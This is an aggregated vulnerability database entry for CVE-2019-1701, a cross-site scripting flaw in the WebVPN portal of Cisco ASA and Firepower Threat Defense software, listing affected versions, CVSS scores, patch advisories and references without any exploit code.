ID

VAR-201905-0583


CVE

CVE-2019-1701


TITLE

Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2019-003888

DESCRIPTION

Multiple vulnerabilities in the WebVPN service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the WebVPN portal of an affected device. The vulnerabilities exist because the software insufficiently validates user-supplied input on an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information. An attacker would need administrator privileges on the device to exploit these vulnerabilities. Multiple Cisco Products are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug IDs CSCvn78674, CSCvo11406, CSCvo11416, CSCvo17033. The vulnerability stems from the lack of correct validation of client data in WEB applications

Trust: 1.98

sources: NVD: CVE-2019-1701 // JVNDB: JVNDB-2019-003888 // BID: 108152 // VULHUB: VHN-149213

AFFECTED PRODUCTS

vendor:ciscomodel:adaptive security appliance softwarescope:gteversion:9.5

Trust: 1.0

vendor:ciscomodel:firepower threat defensescope:ltversion:6.3.0.3

Trust: 1.0

vendor:ciscomodel:adaptive security appliance softwarescope:ltversion:9.9.2.50

Trust: 1.0

vendor:ciscomodel:adaptive security appliance softwarescope:ltversion:9.10.1.17

Trust: 1.0

vendor:ciscomodel:firepower threat defensescope:gteversion:6.2.1

Trust: 1.0

vendor:ciscomodel:adaptive security appliance softwarescope:ltversion:9.8.4

Trust: 1.0

vendor:ciscomodel:adaptive security appliance softwarescope:ltversion:9.6.4.25

Trust: 1.0

vendor:ciscomodel:adaptive security appliance softwarescope:ltversion:9.4.4.34

Trust: 1.0

vendor:ciscomodel:adaptive security appliance softwarescope:gteversion:9.10

Trust: 1.0

vendor:ciscomodel:firepower threat defensescope:gteversion:6.3.0

Trust: 1.0

vendor:ciscomodel:firepower threat defensescope:ltversion:6.2.3.12

Trust: 1.0

vendor:ciscomodel:adaptive security appliance softwarescope:gteversion:9.7

Trust: 1.0

vendor:ciscomodel:adaptive security appliance softwarescope:gteversion:9.9

Trust: 1.0

vendor:ciscomodel:adaptive security appliance softwarescope: - version: -

Trust: 0.8

vendor:ciscomodel:firepower threat defense softwarescope: - version: -

Trust: 0.8

vendor:ciscomodel:firepower threat defense virtualscope:eqversion:0

Trust: 0.3

vendor:ciscomodel:firepower security appliancescope:eqversion:93000

Trust: 0.3

vendor:ciscomodel:firepower seriesscope:eqversion:41000

Trust: 0.3

vendor:ciscomodel:firepower seriesscope:eqversion:21000

Trust: 0.3

vendor:ciscomodel:asa services module for cisco catalyst series switchesscope:eqversion:65000

Trust: 0.3

vendor:ciscomodel:asa services module for cisco series routersscope:eqversion:76000

Trust: 0.3

vendor:ciscomodel:asa adaptive security appliancescope:eqversion:55050

Trust: 0.3

vendor:ciscomodel:asa series firewallsscope:eqversion:5500-x9.9(2)

Trust: 0.3

vendor:ciscomodel:asa series firewallsscope:eqversion:5500-x9.8(1)

Trust: 0.3

vendor:ciscomodel:asa series firewallsscope:eqversion:5500-x9.6(2)

Trust: 0.3

vendor:ciscomodel:asa series firewallsscope:eqversion:5500-x9.4(4)

Trust: 0.3

vendor:ciscomodel:asa series firewallsscope:eqversion:5500-x0

Trust: 0.3

vendor:ciscomodel:asa cloud firewallscope:eqversion:1000v0

Trust: 0.3

vendor:ciscomodel:adaptive security virtual appliancescope:eqversion:0

Trust: 0.3

vendor:ciscomodel:series industrial security appliancesscope:eqversion:30000

Trust: 0.3

sources: BID: 108152 // JVNDB: JVNDB-2019-003888 // NVD: CVE-2019-1701

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-1701
value: MEDIUM

Trust: 1.0

ykramarz@cisco.com: CVE-2019-1701
value: MEDIUM

Trust: 1.0

NVD: CVE-2019-1701
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201905-031
value: MEDIUM

Trust: 0.6

VULHUB: VHN-149213
value: LOW

Trust: 0.1

nvd@nist.gov: CVE-2019-1701
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-149213
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2019-1701
baseSeverity: MEDIUM
baseScore: 4.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 1.7
impactScore: 2.7
version: 3.0

Trust: 2.8

sources: VULHUB: VHN-149213 // JVNDB: JVNDB-2019-003888 // CNNVD: CNNVD-201905-031 // NVD: CVE-2019-1701 // NVD: CVE-2019-1701

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-149213 // JVNDB: JVNDB-2019-003888 // NVD: CVE-2019-1701

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201905-031

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201905-031

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-003888

PATCH

title:cisco-sa-20190501-asa-ftd-xssurl:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-asa-ftd-xss

Trust: 0.8

title:Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Fixes for cross-site scripting vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92182

Trust: 0.6

sources: JVNDB: JVNDB-2019-003888 // CNNVD: CNNVD-201905-031

EXTERNAL IDS

db:NVDid:CVE-2019-1701

Trust: 2.8

db:BIDid:108152

Trust: 2.0

db:JVNDBid:JVNDB-2019-003888

Trust: 0.8

db:CNNVDid:CNNVD-201905-031

Trust: 0.7

db:AUSCERTid:ESB-2019.1510.2

Trust: 0.6

db:VULHUBid:VHN-149213

Trust: 0.1

sources: VULHUB: VHN-149213 // BID: 108152 // JVNDB: JVNDB-2019-003888 // CNNVD: CNNVD-201905-031 // NVD: CVE-2019-1701

REFERENCES

url:http://www.securityfocus.com/bid/108152

Trust: 2.3

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190501-asa-ftd-xss

Trust: 2.0

url:https://nvd.nist.gov/vuln/detail/cve-2019-1701

Trust: 1.4

url:http://www.cisco.com/

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1701

Trust: 0.8

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190501-asa-ftd-ike-dos

Trust: 0.6

url:https://www.auscert.org.au/bulletins/80090

Trust: 0.6

url:https://vigilance.fr/vulnerability/cisco-asa-cross-site-scripting-via-webvpn-29197

Trust: 0.6

sources: VULHUB: VHN-149213 // BID: 108152 // JVNDB: JVNDB-2019-003888 // CNNVD: CNNVD-201905-031 // NVD: CVE-2019-1701

CREDITS

Qian Chen of Qihoo 360 Information Security Department for reporting one of these vulnerabilities. The other vulnerabilities in this advisory were found during internal security testing.

Trust: 0.6

sources: CNNVD: CNNVD-201905-031

SOURCES

db:VULHUBid:VHN-149213
db:BIDid:108152
db:JVNDBid:JVNDB-2019-003888
db:CNNVDid:CNNVD-201905-031
db:NVDid:CVE-2019-1701

LAST UPDATE DATE

2024-08-14T13:45:03.618000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-149213date:2019-10-09T00:00:00
db:BIDid:108152date:2019-05-01T00:00:00
db:JVNDBid:JVNDB-2019-003888date:2019-05-23T00:00:00
db:CNNVDid:CNNVD-201905-031date:2019-05-08T00:00:00
db:NVDid:CVE-2019-1701date:2023-08-15T15:24:56.340

SOURCES RELEASE DATE

db:VULHUBid:VHN-149213date:2019-05-03T00:00:00
db:BIDid:108152date:2019-05-01T00:00:00
db:JVNDBid:JVNDB-2019-003888date:2019-05-23T00:00:00
db:CNNVDid:CNNVD-201905-031date:2019-05-01T00:00:00
db:NVDid:CVE-2019-1701date:2019-05-03T16:29:00.367